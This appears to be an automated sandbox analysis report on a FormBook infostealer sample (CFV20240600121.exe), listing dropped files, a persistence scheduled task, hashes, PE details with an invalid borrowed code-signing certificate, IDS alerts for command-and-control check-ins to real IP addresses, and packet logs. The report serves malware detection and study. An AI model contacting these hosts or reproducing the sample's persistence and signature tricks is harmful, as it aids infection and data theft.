                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtjrzqb5.er4.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\tmp25A3.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1584
                                      Entropy (8bit):5.107981523371107
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgergYrFdOFzOzN33ODOiDdKrsuTDv
                                      MD5:F8403D2D1F01438A420B87D8870F7878
                                      SHA1:3BF4C061AFA5BFAAADCB74AC3CBCB571430283C4
                                      SHA-256:1AA60286C0344C7EA6FD89B7584A6C485406B169CF8038FABC14A3CD9CB61503
                                      SHA-512:4CA868716B73D864102AC83CC2DC6B00D26D3924565A6D306A2E439FDBD7160917E21A01BB0C61D9DE809B2E5161651872B7D18A872CAF85F592E07ABAC34553
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                      C:\Users\user\AppData\Local\Temp\tmpA2C.tmp

                                      Download File
                                      Process:C:\Users\user\Desktop\CFV20240600121.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1584
                                      Entropy (8bit):5.107981523371107
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgergYrFdOFzOzN33ODOiDdKrsuTDv
                                      MD5:F8403D2D1F01438A420B87D8870F7878
                                      SHA1:3BF4C061AFA5BFAAADCB74AC3CBCB571430283C4
                                      SHA-256:1AA60286C0344C7EA6FD89B7584A6C485406B169CF8038FABC14A3CD9CB61503
                                      SHA-512:4CA868716B73D864102AC83CC2DC6B00D26D3924565A6D306A2E439FDBD7160917E21A01BB0C61D9DE809B2E5161651872B7D18A872CAF85F592E07ABAC34553
                                      Malicious:true
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                      C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\CFV20240600121.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):773640
                                      Entropy (8bit):7.950922078829525
                                      Encrypted:false
                                      SSDEEP:12288:KX0pxQV36Di8BtLF6hs8KymBqr7bO3n68H6gf28x3tZQsjTxNT/xpIw1XkR:KBFKn6yBi2Kg6gfJx33H/xej
                                      MD5:8874212365EF57AEEE15045F9EC684EB
                                      SHA1:F509011E519095509F0368DC9289BDC6A48EBE96
                                      SHA-256:AD27785339182485262A3A4B39D554D00AA73CB1CA437A28B181DF2901036404
                                      SHA-512:AE9639A3B83397F57A2BB0D58F6C9354F987E8851C0A29F68EFFD91AC01F1C4CE2DCEFD33CC5C9C0E13688202CDB0DD063155406A0744CB2037BAF98E07E7273
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 29%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3iff..............0..h...(........... ........@.. ....................................@....................................O........................6........................................................... ............... ..H............text...$e... ...h.................. ..`.rsrc............ ...p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe:Zone.Identifier

                                      Download File
                                      Process:C:\Users\user\Desktop\CFV20240600121.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.950922078829525
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                      • Win32 Executable (generic) a (10002005/4) 49.93%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:CFV20240600121.exe
                                      File size:773'640 bytes
                                      MD5:8874212365ef57aeee15045f9ec684eb
                                      SHA1:f509011e519095509f0368dc9289bdc6a48ebe96
                                      SHA256:ad27785339182485262a3a4b39d554d00aa73cb1ca437a28b181df2901036404
                                      SHA512:ae9639a3b83397f57a2bb0d58f6c9354f987e8851c0a29f68effd91ac01f1c4ce2dcefd33cc5c9c0e13688202cdb0dd063155406a0744cb2037baf98e07e7273
                                      SSDEEP:12288:KX0pxQV36Di8BtLF6hs8KymBqr7bO3n68H6gf28x3tZQsjTxNT/xpIw1XkR:KBFKn6yBi2Kg6gfJx33H/xej
                                      TLSH:34F42348375CBB86E4BE8BB80076B47443F370CA186AD19AEEEC95CC21937A18357D57
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3iff..............0..h...(........... ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:c5a5a45716969696

                                      Static PE Info

                                      General

                                      Entrypoint:0x4b851e
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66666933 [Mon Jun 10 02:47:15 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Authenticode Signature

                                      Signature Valid:false
                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                      Signature Validation Error:The digital signature of the object did not verify
                                      Error Number:-2146869232
                                      Not Before, Not After
                                      • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                      Subject Chain
                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                      Version:3
                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                      Serial:7C1118CBBADC95DA3752C46E47A27438

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb84cc0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x1ecc.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xb98000x3608
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xbc0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xb65240xb68004e6f8cfff7266c24bf5ca2133212bfdcFalse0.9649975920376712data7.968738777305981IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xba0000x1ecc0x200075e3c0f140bc69374d943844ea3fdf90False0.8333740234375data7.216750164369922IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xbc0000xc0x800369b7188ac7efeb708812d81d1e06148False0.015625data0.03037337037012526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0xba1000x1959PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9465248882724611
                                      RT_GROUP_ICON0xbba6c0x14data1.05
                                      RT_VERSION0xbba900x23cdata0.46678321678321677
                                      RT_MANIFEST0xbbcdc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      06/10/24-10:21:25.134241TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25137480192.168.2.534.149.87.45
                                      06/10/24-10:21:39.107622TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25137880192.168.2.5116.213.43.190
                                      06/10/24-10:24:15.334767TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25142280192.168.2.5172.67.160.38
                                      06/10/24-10:20:47.394016TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971780192.168.2.5101.36.121.143
                                      06/10/24-10:23:47.463476TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25141480192.168.2.564.226.69.42
                                      06/10/24-10:23:33.648907TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25141080192.168.2.5103.120.80.111
                                      06/10/24-10:21:11.241457TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25137080192.168.2.585.13.162.190
                                      06/10/24-10:21:52.948385TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25138280192.168.2.5102.222.124.13
                                      06/10/24-10:22:07.327341TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25138680192.168.2.535.241.34.216
                                      06/10/24-10:23:19.260037TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25140680192.168.2.5217.116.0.191
                                      06/10/24-10:22:21.730111TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25139080192.168.2.5176.113.70.180
                                      06/10/24-10:22:36.059394TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25139480192.168.2.5101.36.121.143
                                      06/10/24-10:24:01.195678TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25141880192.168.2.53.64.163.50
                                      06/10/24-10:22:51.257192TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25139880192.168.2.5103.138.88.32
                                      06/10/24-10:23:05.760710TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M25140280192.168.2.5162.0.213.72

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jun 10, 2024 10:20:47.385668993 CEST4971780192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:20:47.390649080 CEST8049717101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:20:47.390763044 CEST4971780192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:20:47.394016027 CEST4971780192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:20:47.398911953 CEST8049717101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:20:48.354218960 CEST8049717101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:20:48.403568983 CEST4971780192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:20:48.542557955 CEST8049717101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:20:48.542711973 CEST4971780192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:20:48.543991089 CEST4971780192.168.2.5101.36.121.143
                                      Jun 10, 2024 10:20:48.548914909 CEST8049717101.36.121.143192.168.2.5
                                      Jun 10, 2024 10:21:03.637753010 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:03.642673016 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:03.643408060 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:03.645113945 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:03.651510954 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.652988911 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653104067 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653139114 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653167009 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.653207064 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653240919 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653256893 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.653276920 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653310061 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653326988 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.653343916 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653376102 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653398037 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.653409958 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653445959 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.653461933 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.658487082 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.658521891 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.658544064 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.658554077 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.658607006 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.715687990 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.715792894 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.715859890 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.715928078 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.715960979 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.715996027 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.716011047 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.716029882 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.716072083 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.716270924 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.716370106 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.716417074 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.716533899 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.716587067 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.716620922 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.716635942 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.716654062 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.716702938 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.717271090 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.717325926 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.717360020 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.717375040 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.717411995 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.717458963 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.718168020 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.762881994 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:04.853924990 CEST805136785.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:04.854032993 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:05.153744936 CEST5136780192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:06.173202038 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:06.178215981 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:06.178318977 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:06.180073977 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:06.185123920 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142230034 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142250061 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142265081 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142280102 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142293930 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142317057 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142327070 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.142366886 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142381907 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.142383099 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142381907 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.142400980 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142416954 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.142425060 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.142456055 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.147352934 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.147368908 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.147384882 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.147399902 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.147414923 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.147440910 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.281220913 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281275034 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281310081 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281342983 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281342983 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.281379938 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281413078 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.281414032 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281459093 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.281469107 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281502962 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281538010 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281544924 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.281898975 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281933069 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.281954050 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.281974077 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.282016993 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.282061100 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.282109022 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.282152891 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.282691956 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.325460911 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.418811083 CEST805136885.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:07.418893099 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:07.684875011 CEST5136880192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:08.703629971 CEST5136980192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:08.708585978 CEST805136985.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:08.708702087 CEST5136980192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:08.710488081 CEST5136980192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:08.716054916 CEST805136985.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:08.716233969 CEST805136985.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:09.672548056 CEST805136985.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:09.672584057 CEST805136985.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:09.672616959 CEST805136985.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:09.672633886 CEST805136985.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:09.672708035 CEST5136980192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:09.672780991 CEST5136980192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:09.672784090 CEST805136985.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:09.672818899 CEST805136985.13.162.190192.168.2.5
                                      Jun 10, 2024 10:21:09.672866106 CEST5136980192.168.2.585.13.162.190
                                      Jun 10, 2024 10:21:09.672883987 CEST805136985.13.162.190192.168.2.5
